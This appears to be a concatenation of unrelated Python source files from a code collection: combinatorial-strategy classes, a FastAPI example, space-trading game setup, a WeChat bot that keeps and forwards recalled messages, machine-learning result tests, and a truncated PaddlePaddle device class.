- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
"""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = True,
possibly_empty: bool = True,
workable: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
def __call__(
self,
comb_class: CombinatorialClassType,
children: Tuple[CombinatorialClassType, ...] = None,
**kwargs
) -> Rule[CombinatorialClassType, CombinatorialObjectType]:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return Rule(self, comb_class, children=children)
@abc.abstractmethod
def constructor(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Constructor:
"""
This is where the details of the 'reliance profile' and 'counting'
functions are hidden.
"""
if children is None:
children = self.decomposition_function(comb_class)
@abc.abstractmethod
def backward_map(
self,
comb_class: CombinatorialClassType,
objs: Tuple[Optional[CombinatorialObjectType], ...],
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> CombinatorialObjectType:
"""
        The backward direction of the underlying bijection used for object
generation and sampling.
"""
if children is None:
children = self.decomposition_function(comb_class)
@abc.abstractmethod
def forward_map(
self,
comb_class: CombinatorialClassType,
obj: CombinatorialObjectType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Tuple[Optional[CombinatorialObjectType], ...]:
"""
        The forward direction of the underlying bijection used for object
generation and sampling.
"""
if children is None:
children = self.decomposition_function(comb_class)
def extra_parameters(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Tuple[Dict[str, str], ...]:
"""
This should be a tuple of dictionaries where the parent parameters point
to the corresponding child parameter. Any parent parameter not
corresponding to a child parameter must have no objects that are on
that child.
"""
assert not comb_class.extra_parameters, (
"you need to update the 'extra_parameters' method in the strategy {} "
"in order to enumerate class with multiple extra_parameters".format(
str(self)
)
)
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return tuple(dict() for _ in children)
class CartesianProductStrategy(
Strategy[CombinatorialClassType, CombinatorialObjectType]
):
"""
The CartesianProductStrategy is a subclass of strategy. The constructor is
CartesianProduct. Such strategies by default assume
ignore_parent=True, inferrable=False, possibly_empty=False, and
workable=True.
The bijection maps an object a -> (b1, ..., bk) where bi is the object in
the child at index i returned by the decomposition function.
"""
def __init__(
self,
ignore_parent: bool = True,
inferrable: bool = False,
possibly_empty: bool = False,
workable: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
@staticmethod
def can_be_equivalent() -> bool:
return True
def constructor(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> Constructor:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return CartesianProduct(
comb_class,
children,
extra_parameters=self.extra_parameters(comb_class, children),
)
@staticmethod
def get_op_symbol() -> str:
"""
Return a choice for '+' in the pretty print a '=' b '+' c of rules.
        Your choice should be a single character.
"""
return "x"
class DisjointUnionStrategy(Strategy[CombinatorialClassType, CombinatorialObjectType]):
"""
The DisjointUnionStrategy is a subclass of Strategy. The constructor used
is DisjointUnion.
The bijection maps an object a -> (None, ..., b, ..., None) where b is at
the index of the child it belongs to.
"""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = True,
possibly_empty: bool = True,
workable: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
@staticmethod
def can_be_equivalent() -> bool:
return True
def constructor(
self,
comb_class: CombinatorialClassType,
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> DisjointUnion:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("Strategy does not apply")
return DisjointUnion(
comb_class,
children,
extra_parameters=self.extra_parameters(comb_class, children),
)
@staticmethod
def backward_map_index(objs: Tuple[Optional[CombinatorialObjectType], ...]) -> int:
"""
Return the index of the comb_class that the sub_object returned.
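        For example, objs == (None, obj, None) maps to index 1.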
"""
for idx, obj in enumerate(objs):
if obj is not None:
return idx
        raise ObjectMappingError(
            "For a disjoint union strategy, an object O is mapped to the tuple "
            "with entries being None, except at the index of the child which "
            "contains O, where it should be O."
        )
def backward_map(
self,
comb_class: CombinatorialClassType,
objs: Tuple[Optional[CombinatorialObjectType], ...],
children: Optional[Tuple[CombinatorialClassType, ...]] = None,
) -> CombinatorialObjectType:
"""
This method will enable us to generate objects, and sample.
If it is a direct bijection, the below implementation will work!
"""
if children is None:
children = self.decomposition_function(comb_class)
idx = DisjointUnionStrategy.backward_map_index(objs)
return cast(CombinatorialObjectType, objs[idx])
@staticmethod
def get_op_symbol() -> str:
"""
Return a choice for '+' in the pretty print a '=' b '+' c of rules.
        Your choice should be a single character.
"""
return "+"
class SymmetryStrategy(
DisjointUnionStrategy[CombinatorialClassType, CombinatorialObjectType]
):
"""General representation for a symmetry strategy."""
def __init__(
self,
ignore_parent: bool = False,
inferrable: bool = False,
possibly_empty: bool = False,
workable: bool = False,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=inferrable,
possibly_empty=possibly_empty,
workable=workable,
)
class VerificationStrategy(
AbstractStrategy[CombinatorialClassType, CombinatorialObjectType]
):
"""
For a VerificationStrategy you must implement the methods:
- verified: Return True if the combinatorial class is
verified by the strategy.
- pack The pack is used to count and generate the
objects. If the strategy doesn't have a CSS
strategy pack that can be used to enumerate
verified combinatorial classes, then you need
to implement the methods count_objects_of_size,
generate_objects_of_size, and get_genf.
- __repr__ and __str__: This is mostly for printing purposes!
- from_dict: A method that can recreate the class. The dict
passed is empty. If your strategy needs extra
parameters to recreate you should overwrite the
to_jsonable method.
If your verification strategy is for the atoms, consider using the
AtomStrategy, relying on CombinatorialClass methods.
"""
def __init__(
self, ignore_parent: bool = True,
):
super().__init__(
ignore_parent=ignore_parent,
inferrable=False,
possibly_empty=False,
workable=False,
)
def __call__(
self,
comb_class: CombinatorialClassType,
children: Tuple[CombinatorialClassType, ...] = None,
**kwargs
) -> VerificationRule[CombinatorialClassType, CombinatorialObjectType]:
if children is None:
children = self.decomposition_function(comb_class)
if children is None:
raise StrategyDoesNotApply("The combinatorial class is not verified")
return VerificationRule(self, comb_class, children)
@staticmethod
def can_be_equivalent() -> bool:
return False
def pack(self, comb_class: CombinatorialClassType) -> "StrategyPack":
"""
Returns a StrategyPack that finds a proof tree for the comb_class in
which the verification strategies used are "simpler".
The pack is assumed to produce a finite universe.
"""
raise InvalidOperationError(f"can't find specification for {self}")
@abc.abstractmethod
def verified(self, comb_class: CombinatorialClassType) -> bool:
"""
        Returns True if the enumeration strategy works for the combinatorial class.
"""
def get_specification(
self, comb_class: CombinatorialClassType
) -> "CombinatorialSpecification[CombinatorialClassType, CombinatorialObjectType]":
"""
Returns a combinatorial specification for the combinatorial class.
        Raises a `StrategyDoesNotApply` if no specification can be found,
e.g. if it is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
# pylint: disable=import-outside-toplevel
from ..comb_spec_searcher import CombinatorialSpecificationSearcher
searcher = CombinatorialSpecificationSearcher(comb_class, self.pack(comb_class))
specification = searcher.auto_search()
assert specification is not None, StrategyDoesNotApply(
"Cannot find a specification"
)
return specification
def get_genf(
self,
comb_class: CombinatorialClassType,
funcs: Optional[Dict[CombinatorialClassType, Function]] = None,
) -> Expr:
"""
Returns the generating function for the combinatorial class.
        Raises a StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
return self.get_specification(comb_class).get_genf()
def decomposition_function(
self, comb_class: CombinatorialClassType
) -> Union[Tuple[CombinatorialClassType, ...], None]:
"""
A combinatorial class C is marked as verified by returning a rule
C -> (). This ensures that C is in a combinatorial specification as it
appears exactly once on the left hand side.
The function returns None if the verification strategy doesn't apply.
"""
if self.verified(comb_class):
return tuple()
return None
def count_objects_of_size(
self, comb_class: CombinatorialClassType, n: int, **parameters: int
) -> int:
"""
A method to count the objects.
        Raises a StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
return int(
self.get_specification(comb_class).count_objects_of_size(n, **parameters)
)
def generate_objects_of_size(
self, comb_class: CombinatorialClassType, n: int, **parameters: int
) -> Iterator[CombinatorialObjectType]:
"""
A method to generate the objects.
        Raises a StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
yield from self.get_specification(comb_class).generate_objects_of_size(
n, **parameters
)
def random_sample_object_of_size(
self, comb_class: CombinatorialClassType, n: int, **parameters: int
) -> CombinatorialObjectType:
"""
A method to sample uniformly at random from a verified combinatorial class.
        Raises a StrategyDoesNotApply if the combinatorial class is not verified.
"""
if not self.verified(comb_class):
raise StrategyDoesNotApply("The combinatorial class is not verified")
return self.get_specification(comb_class).random_sample_object_of_size(
n, **parameters
)
def to_jsonable(self) -> dict:
d = super().to_jsonable()
d.pop("inferrable")
d.pop("possibly_empty")
d.pop("workable")
return d
class AtomStrategy(VerificationStrategy[CombinatorialClass, CombinatorialObject]):
"""
A subclass for when a combinatorial class is an atom - meaning consisting
of a single object.
"""
def __init__(self):
super().__init__(ignore_parent=True)
@staticmethod
def count_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> int:
"""
Verification strategies must contain a method to count the objects.
"""
if comb_class.extra_parameters:
raise NotImplementedError
if n == comb_class.minimum_size_of_object():
return 1
return 0
def get_genf(
self,
comb_class: CombinatorialClass,
funcs: Optional[Dict[CombinatorialClass, Function]] = None,
) -> Expr:
if comb_class.extra_parameters:
raise NotImplementedError
if not self.verified(comb_class):
            raise StrategyDoesNotApply("Can't find generating function for non-atom.")
x = var("x")
return x ** comb_class.minimum_size_of_object()
@staticmethod
def generate_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> Iterator[CombinatorialObject]:
"""
Verification strategies must contain a method to generate the objects.
"""
if comb_class.extra_parameters:
raise NotImplementedError
if n == comb_class.minimum_size_of_object():
yield from comb_class.objects_of_size(n)
@staticmethod
def random_sample_object_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> CombinatorialObject:
if comb_class.extra_parameters:
raise NotImplementedError
if n == comb_class.minimum_size_of_object():
obj: CombinatorialObject = next(comb_class.objects_of_size(n))
return obj
@staticmethod
def verified(comb_class: CombinatorialClass) -> bool:
return bool(comb_class.is_atom())
@staticmethod
def formal_step() -> str:
return "is atom"
@staticmethod
def pack(comb_class: CombinatorialClass) -> "StrategyPack":
        raise InvalidOperationError("No pack for the atom strategy.")
def to_jsonable(self) -> dict:
d: dict = super().to_jsonable()
d.pop("ignore_parent")
return d
@classmethod
def from_dict(cls, d: dict) -> "AtomStrategy":
assert not d
return cls()
def __repr__(self) -> str:
return self.__class__.__name__ + f"(ignore_parent={self.ignore_parent})"
def __str__(self) -> str:
return "verify atoms"
class EmptyStrategy(VerificationStrategy[CombinatorialClass, CombinatorialObject]):
"""
A subclass for when a combinatorial class is equal to the empty set.
"""
def __init__(self):
super().__init__(ignore_parent=True)
@staticmethod
def count_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> int:
"""
Verification strategies must contain a method to count the objects.
"""
return 0
def get_genf(
self,
comb_class: CombinatorialClass,
funcs: Optional[Dict[CombinatorialClass, Function]] = None,
) -> Integer:
if not self.verified(comb_class):
            raise StrategyDoesNotApply(
                "can't find generating function for non-empty class."
            )
return Integer(0)
@staticmethod
def generate_objects_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> Iterator[CombinatorialObject]:
"""
Verification strategies must contain a method to generate the objects.
"""
return iter([])
@staticmethod
def random_sample_object_of_size(
comb_class: CombinatorialClass, n: int, **parameters: int
) -> CombinatorialObject:
raise StrategyDoesNotApply("Can't sample from empty set.")
@staticmethod
def verified(comb_class: CombinatorialClass) -> bool:
return bool(comb_class.is_empty())
@staticmethod
def formal_step() -> str:
return "is empty"
@staticmethod
def pack(comb_class: CombinatorialClass) -> "StrategyPack":
raise InvalidOperationError("No pack for the empty strategy.")
def to_jsonable(self) -> dict:
d: dict = super().to_jsonable()
d.pop("ignore_parent")
return d
@classmethod
def from_dict(cls, d: dict) -> "EmptyStrategy":
assert not d
return cls()
def __repr__(self) -> str:
return self.__class__.__name__ + "()"
def __str__(self) -> str:
return "the empty strategy"
class StrategyFactory(abc.ABC, Generic[CombinatorialClassType]):
"""
The StrategyFactory class can be used instead of the Strategy class if
you wish to expand a combinatorial class with a family of strategies.
"""
@abc.abstractmethod
def __call__(
self, comb_class: CombinatorialClassType, **kwargs
) -> Iterator[Union[AbstractRule, AbstractStrategy]]:
"""
Returns the results of the strategy on a comb_class.
"""
@abc.abstractmethod
def __str__(self) -> str:
"""
Return the name of the strategy.
"""
@abc.abstractmethod
def __repr__(self) -> str:
pass
def __eq__(self, other: object) -> bool:
return self.__class__ == other.__class__ and self.__dict__ == other.__dict__
def __hash__(self) -> int:
"""
Hash function for the strategy.
        As we don't expect a use case where many objects of the same strategy
        class are used, this hash function should perform correctly.
# TODO: do better, why is it hashable at all?
"""
return hash(self.__class__)
def to_jsonable(self) -> dict:
"""
Return a dictionary form of the strategy.
"""
c = self.__class__
return {
"class_module": c.__module__,
"strategy_class": c.__name__,
}
@classmethod
@abc.abstractmethod
def from_dict(cls, d: dict) -> CSSstrategy:
"""
Return the strategy from the json representation.
"""
return strategy_from_dict(d)
|
py | 7df7dad8bd15d05b6a3497421a711491cf79a3b7 | from typing import Optional
from fastapi import FastAPI
app = FastAPI()
@app.get("/")
def read_root():
return {"Hello": "World"}
@app.get("/items/{item_id}")
def read_item(item_id: int, q: Optional[str] = None):
return {"item_id": item_id, "q": q}
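# To run this app locally you would typically use something like
#     uvicorn main:app --reload
# (assuming the file is saved as main.py and uvicorn is installed).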
|
py | 7df7db05c839eaeef3987a1796b568ab064a80e3 | """
Business logic how to
- create a game
- join a game
"""
import random
from spacetrading.logic import gamesettings
from spacetrading.models import Game, Player, Planet
def create_game(data, user):
    """
    create a game with
    - name (string)
    - 1 <= number_of_players <= 4
    - play_all_players (bool)
    - resource_limit (int)
    - optionally: midgame_scoring (bool), finish_time, start_influence
    - user (Django user)
    """
name = data['name']
number_of_players = data['number_of_players']
play_all_players = data['play_all_players']
resource_limit = data['resource_limit']
midgame_scoring = data.get('midgame_scoring', False)
finish_time = data.get('finish_time', gamesettings.FINISH_TIME)
start_influence = data.get('start_influence', gamesettings.START_INFLUENCE)
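    # Illustrative input only (values made up):
    # data = {'name': 'My game', 'number_of_players': 3, 'play_all_players': False, 'resource_limit': 9}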
game = Game.objects.create_game(
game_name=name,
number_of_players=number_of_players,
offer_demand_event_time=gamesettings.OFFER_DEMAND_EVENT_TIMES[number_of_players-1],
resource_limit=resource_limit,
midgame_scoring=midgame_scoring,
midgame_scoring_event_time=finish_time/2,
finish_time=finish_time,
start_influence=start_influence
)
demand_resources = ['1', '5', '2', '3', '4']
remaining_supply_resources = {'1', '2', '3', '4', '5'}
supply_resources = []
for i in range(3):
        # pick from a sorted list: sampling directly from a set is deprecated in newer Python
        supply_resource = random.choice(sorted(remaining_supply_resources - {demand_resources[i]}))
        remaining_supply_resources.remove(supply_resource)
        supply_resources.append(supply_resource)
remaining_supply_resources = list(remaining_supply_resources)
random.shuffle(remaining_supply_resources)
    if demand_resources[3] == remaining_supply_resources[0] or demand_resources[4] == remaining_supply_resources[1]:
supply_resources.append(remaining_supply_resources[1])
supply_resources.append(remaining_supply_resources[0])
else:
supply_resources.append(remaining_supply_resources[0])
supply_resources.append(remaining_supply_resources[1])
player = Player.objects.create_player(
user=user,
colour="#FF0000",
ship_offset=[0, 0],
player_number=0
)
game.players.add(player)
supply_prices = random.sample(
gamesettings.SETUP_PLANET_SUPPLY_PRICE,
len(gamesettings.SETUP_PLANET_SUPPLY_PRICE)
)
demand_prices = random.sample(
gamesettings.SETUP_PLANET_DEMAND_PRICE,
len(gamesettings.SETUP_PLANET_DEMAND_PRICE)
)
for index, current_planet in enumerate(gamesettings.PLANETS):
planet = Planet.objects.create_planet(
name=current_planet[0],
colour=current_planet[2],
number_of_hexes=current_planet[1],
current_position=random.randint(0, current_planet[1] - 1),
planet_demand_resource=demand_resources[index],
planet_demand_resource_price=demand_prices[index],
planet_supply_resource=supply_resources[index],
planet_supply_resource_price=supply_prices[index],
position_of_hexes=current_planet[3],
radius_x=current_planet[4][0],
radius_y=current_planet[4][1],
offset=current_planet[5],
planet_number=index
)
game.planets.add(planet)
if number_of_players == 1:
game.game_state = 'r'
game.save()
player.save()
if play_all_players:
for _ in range(number_of_players - 1):
join_game(game.id, user)
def join_game(primary_key_game, user):
"""
join an open game
- primary_key_game is the id of the game we want to join
- user is the Django user which wants to join
"""
game = Game.objects.get(pk=primary_key_game)
number_of_joined_players = game.players.count()
if number_of_joined_players >= game.number_of_players or number_of_joined_players > 3:
return
colours = ["#FF0000", "#0000FF", "#FFFFFF", "#00FF00"]
offsets = [[0, 0], [-10, 0], [-10, -15], [0, -15]]
player = Player.objects.create_player(
user=user,
colour=colours[number_of_joined_players],
ship_offset=offsets[number_of_joined_players],
player_number=number_of_joined_players
)
game.players.add(player)
if number_of_joined_players == game.number_of_players - 1:
players = game.players.all()
player_numbers = list(range(len(players)))
random.shuffle(player_numbers)
for index, current_player in enumerate(players):
current_player.player_number = player_numbers[index]
current_player.last_move = -current_player.player_number - 1
current_player.money = 10 + game.number_of_players - \
current_player.player_number - 1
current_player.save()
game.game_state = 'r'
elif number_of_joined_players > game.number_of_players - 1:
game.players.remove(player)
player.delete()
game.save()
|
py | 7df7db099f573a3adfc05c75f3f8d04a61637dac | # -*- coding: utf-8 -*-
"""
1 - Original author
Author: AlicFeng
Link: https://www.jianshu.com/p/712d19374b2e
Source: Jianshu (简书)
Copyright belongs to the author. Commercial reuse requires the author's
permission; non-commercial reuse should credit the source.
2 - Added MongoDB storage
3 - Added Docker support
"""
from gevent import monkey
monkey.patch_all()
import os
import re
import time
import itchat
import gevent
from itchat.content import *
from dbdriver import MongoBase
# Note: recallable message types are text, voice, video, picture, location, card, sharing and attachment
# {msg_id:(msg_from,msg_to,msg_time,msg_time_rec,msg_type,msg_content,msg_share_url)}
msg_dict = {}
# Temporary directory for storing received files
rev_tmp_dir = "./RevDir/"
if not os.path.exists(rev_tmp_dir): os.mkdir(rev_tmp_dir)
# Stickers are a special case: the msg_id of the received message and of the recall NOTE differ, so this is a workaround
face_bug = None
# Database setup
store = MongoBase('172.17.0.2', '27017')
store.switchDataBase('wechat')
# Received messages are cached in a dict; stale entries are cleaned out as new messages arrive | message types without recall support are not registered
# [TEXT, PICTURE, MAP, CARD, SHARING, RECORDING, ATTACHMENT, VIDEO, FRIENDS, NOTE]
@itchat.msg_register([TEXT, PICTURE, MAP, CARD, SHARING, RECORDING, ATTACHMENT, VIDEO])
def handler_receive_msg(msg):
global face_bug
    # Get the local timestamp and format it, e.g. 2017-04-21 21:30:08
msg_time_rec = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    # Message ID
msg_id = msg['MsgId']
    # Message timestamp
msg_time = msg['CreateTime']
    # Sender nickname | RemarkName (contact remark) could be used instead, but it is None for yourself or contacts without a remark
msg_from_user = msg['FromUserName']
msg_to_user = msg['ToUserName']
msg_from = (itchat.search_friends(userName=msg_from_user))["NickName"]
msg_to = (itchat.search_friends(userName=msg_to_user))["NickName"]
    # Message content
msg_content = None
    # Shared link
msg_share_url = None
if msg['Type'] == 'Text' \
or msg['Type'] == 'Friends':
msg_content = msg['Text']
elif msg['Type'] == 'Recording' \
or msg['Type'] == 'Attachment' \
or msg['Type'] == 'Video' \
or msg['Type'] == 'Picture':
msg_content = r"" + msg['FileName']
        # Save the file locally
msg['Text'](rev_tmp_dir + msg['FileName'])
elif msg['Type'] == 'Card':
        msg_content = msg['RecommendInfo']['NickName'] + r"'s business card"
elif msg['Type'] == 'Map':
x, y, location = re.search(
"<location x=\"(.*?)\" y=\"(.*?)\".*label=\"(.*?)\".*", msg['OriContent']).group(1, 2, 3)
if location is None:
            msg_content = r"Latitude->" + x.__str__() + " Longitude->" + y.__str__()
else:
msg_content = r"" + location
elif msg['Type'] == 'Sharing':
msg_content = msg['Text']
msg_share_url = msg['Url']
face_bug = msg_content
    # Update the message cache
msg_dict.update(
{
msg_id: {
"msg_from": msg_from, "msg_time": msg_time, "msg_time_rec": msg_time_rec,
"msg_type": msg["Type"],
"msg_content": msg_content, "msg_share_url": msg_share_url
}
}
)
msg_info_text = dict()
msg_info_text['send_user_id'] = msg_from_user
msg_info_text['recv_user_id'] = msg_to_user
msg_info_text['local_time'] = msg_time_rec
msg_info_text['msg_id'] = msg_id
msg_info_text['msg_time'] = msg_time
msg_info_text['msg_from'] = msg_from
msg_info_text['msg_to'] = msg_to
msg_info_text['msg_content'] = msg_content
store.conCollection('text')
a = store.inserDocument(msg_info_text)
# On NOTE (notification) messages, check whether it is a recall and act accordingly
@itchat.msg_register(NOTE)
def send_msg_helper(msg):
global face_bug
if re.search(r"CDATA", msg['Content']) is not None:
if len(msg_dict) == 0:
return
        # Get the id of the recalled message
        old_msg_id = re.search(r"<msgid>(.*?)</msgid>", msg['Content']).group(1)
old_msg = msg_dict.get(old_msg_id, {})
recal_text = old_msg['msg_content']
if len(old_msg_id) < 11:
itchat.send_file(rev_tmp_dir + face_bug, toUserName='filehelper')
os.remove(rev_tmp_dir + face_bug)
else:
msg_body = 'Monitor: ' + '\n' \
                       + old_msg.get('msg_from') + ' recalled a ' + old_msg.get('msg_type') + ' message' + '\n' \
+ old_msg.get('msg_time_rec') + '\n' \
+ recal_text
            # If it was a share, include its link
            if old_msg['msg_type'] == "Sharing": msg_body += "\nHere is the link➣ " + old_msg.get('msg_share_url')
            # Forward the recalled message to the file helper
itchat.send(msg_body, toUserName='filehelper')
            # If a file was attached, send the file back as well
if old_msg["msg_type"] == "Picture" \
or old_msg["msg_type"] == "Recording" \
or old_msg["msg_type"] == "Video" \
or old_msg["msg_type"] == "Attachment":
file = '@fil@%s' % (rev_tmp_dir + old_msg['msg_content'])
itchat.send(msg=file, toUserName='filehelper')
os.remove(rev_tmp_dir + old_msg['msg_content'])
            # Remove the old message from the cache
msg_dict.pop(old_msg_id)
def login():
itchat.auto_login(hotReload=True,enableCmdQR=2)
itchat.run()
def run():
gevent.joinall([gevent.spawn(login)])
|
py | 7df7db27c63c0620e69562409874c1b769d17a47 | import os
import numpy as np
import pandas as pd
from datto.ModelResults import ModelResults
from sklearn.linear_model import ElasticNet, LogisticRegression
from sklearn.tree import DecisionTreeClassifier
mr = ModelResults()
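# Shared fixtures reused by the tests below: small synthetic train/test frames plus a grouped text frame.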
X_train = pd.DataFrame(
[
[1434, 56456, 1],
[323, 768, 0],
[5435, 564746456, 0],
[544, 55567, 21],
[57978, 58, 2],
[437, 336, 1],
[544565, 858, 4],
[456547, 56456, 10],
],
columns=["id", "webpage", "count"],
)
y_train = np.array([1, 1, 1, 0, 1, 0, 0, 1])
X_test = pd.DataFrame(
[
[234, 35656, 1],
[7878, 435345, 0],
[3454, 345, 0],
[78758, 345, 21],
[234234, 5477, 2],
[654757, 356536, 1],
[345, 457457, 4],
[234, 345, 10],
],
columns=["id", "webpage", "count"],
)
y_test = np.array([1, 0, 0, 0, 1, 0, 0, 1])
X_text = pd.DataFrame(
[
["some text", 1],
["some other text", 1],
["i like bananas", 2],
["i like apples", 2],
["running is fun", 3],
["jumping is fun running is fun", 3],
["do you read mysteries? running is fun", 4],
["do you read nonfiction?", 4],
["some text", 1],
["some other text", 1],
["i like bananas", 2],
["i like apples", 2],
["running is fun", 3],
["jumping is fun running is fun", 3],
["do you read mysteries? running is fun", 4],
["do you read nonfiction?", 4],
["some text", 1],
["some other text", 1],
["i like bananas", 2],
["i like apples", 2],
["running is fun", 3],
["jumping is fun running is fun", 3],
["do you read mysteries? running is fun", 4],
["do you read nonfiction?", 4],
],
columns=["text", "group_id"],
)
def test_most_similar_texts():
num_topics = 4
num_examples = 5
text_column_name = "text"
chosen_stopwords = set(["the"])
top_words_df, _, _ = mr.most_similar_texts(
X_text,
num_examples,
text_column_name,
num_topics,
chosen_stopwords,
min_df=3,
max_df=0.4,
min_ngrams=1,
max_ngrams=3,
)
assert top_words_df.shape[0] == num_topics
def test_most_common_words_by_group():
results_df = mr.most_common_words_by_group(X_text, "text", "group_id", 3, 1, 3)
assert X_text["group_id"].nunique() == results_df.shape[0]
def test_score_final_model_classification():
model = LogisticRegression()
trained_model = model.fit(X_train, y_train)
_, y_predicted = mr.score_final_model(
"classification", X_test, y_test, trained_model
)
assert len(y_predicted) == y_test.shape[0]
def test_score_final_model_regression():
model = ElasticNet()
trained_model = model.fit(X_train, y_train)
_, y_predicted = mr.score_final_model("regression", X_test, y_test, trained_model)
assert len(y_predicted) == y_test.shape[0]
def test_coefficients_graph_classification():
model = LogisticRegression()
model.fit(X_train, y_train)
shap_values = mr.coefficients_graph(
X_train, X_test, model, "classification", "classification_test"
)
assert isinstance(shap_values, np.ndarray)
def test_coefficients_graph_regression():
model = ElasticNet()
model.fit(X_train, y_train)
shap_values = mr.coefficients_graph(
X_train, X_test, model, "regression", "regression_test"
)
assert isinstance(shap_values, np.ndarray)
def test_coefficients_individual_predictions_classification():
model = LogisticRegression()
trained_model = model.fit(X_train, y_train)
id_col = "id"
num_id_examples = 3
num_feature_examples = 5
model_type = "classification"
class_names = ["False", "True"]
features_list = mr.coefficients_individual_predictions(
trained_model,
X_train,
X_train,
X_test,
id_col,
num_id_examples,
num_feature_examples,
model_type,
class_names,
)
assert isinstance(features_list, list)
def test_coefficients_individual_predictions_regression():
model = ElasticNet()
trained_model = model.fit(X_train, y_train)
id_col = "id"
num_id_examples = 3
num_feature_examples = 5
model_type = "regression"
features_list = mr.coefficients_individual_predictions(
trained_model,
X_train,
X_train,
X_test,
id_col,
num_id_examples,
num_feature_examples,
model_type,
)
assert isinstance(features_list, list)
def test_score_final_model_multiclass():
y_train = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 0],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
y_test = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 0],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
model = DecisionTreeClassifier()
trained_model = model.fit(X_train, y_train)
_, y_predicted = mr.score_final_model(
"classification", X_test, y_test, trained_model, multiclass=True
)
assert len(y_predicted) == y_test.shape[0]
def test_coefficients_summary_multiclass():
y_train = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 0],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
# For some reason this errors if using more than one feature
results_df = mr.coefficients_summary(
pd.DataFrame(X_train["count"]), y_train, 5, 3, "classification", multiclass=True
)
assert results_df.shape[0] == 1
def test_coefficients_summary_classification():
results_df = mr.coefficients_summary(
pd.DataFrame(X_train["count"]), y_train, 5, 3, "classification"
)
assert results_df.shape[0] == 1
def test_coefficients_summary_regression():
results_df = mr.coefficients_summary(
pd.DataFrame(X_train["count"]), y_train, 5, 3, "regression"
)
assert results_df.shape[0] == 1
def test_get_tree_diagram():
path = "../images/"
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
mr.get_tree_diagram(model, X_train, path)
assert os.path.exists(f"{path}decision-tree.png")
def test_coefficients_graph_multiclass():
model = DecisionTreeClassifier()
y_train = pd.DataFrame(
[
[1, 1],
[1, 0],
[1, 1],
[1, 1],
[1, 0],
[1, 1],
[0, 1],
[1, 1],
],
columns=["var1", "var2"],
)
model.fit(X_train, y_train)
shap_values = mr.coefficients_graph(
X_train,
X_test,
model,
"classification",
"multiclass_test",
multiclass=True,
y_test=y_train,
)
assert isinstance(shap_values, np.ndarray)
|
py | 7df7db28f7877f28e6100fa53acbf9c192bd206a | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
class DeviceType:
CPU = 'cpu'
GPU = 'gpu'
XPU = 'xpu'
NPU = 'npu'
MLU = 'mlu'
class Device(object):
def __init__(self, dtype=None, memory="", labels=""):
self._dtype = dtype
self._memory = memory
self._labels = labels
def __str__(self):
return ",".join(self._labels)
@property
def dtype(self):
return self._dtype
@property
def count(self):
return len(self._labels) or 1
@property
def memory(self):
return self._memory
@property
def labels(self):
return self._labels
@labels.setter
def labels(self, lbs):
if isinstance(lbs, str):
self._labels = lbs.split(',')
elif isinstance(lbs, list):
self._labels = lbs
else:
self._labels = []
def get_selected_device_key(self):
if self._dtype == DeviceType.CPU:
return 'FLAGS_selected_cpus'
if self._dtype == DeviceType.GPU:
return 'FLAGS_selected_gpus'
if self._dtype == DeviceType.NPU:
return 'FLAGS_selected_npus'
if self._dtype == DeviceType.XPU:
return 'FLAGS_selected_xpus'
if self._dtype == DeviceType.MLU:
return 'FLAGS_selected_mlus'
return 'FLAGS_selected_devices'
def get_selected_devices(self, devices=''):
'''
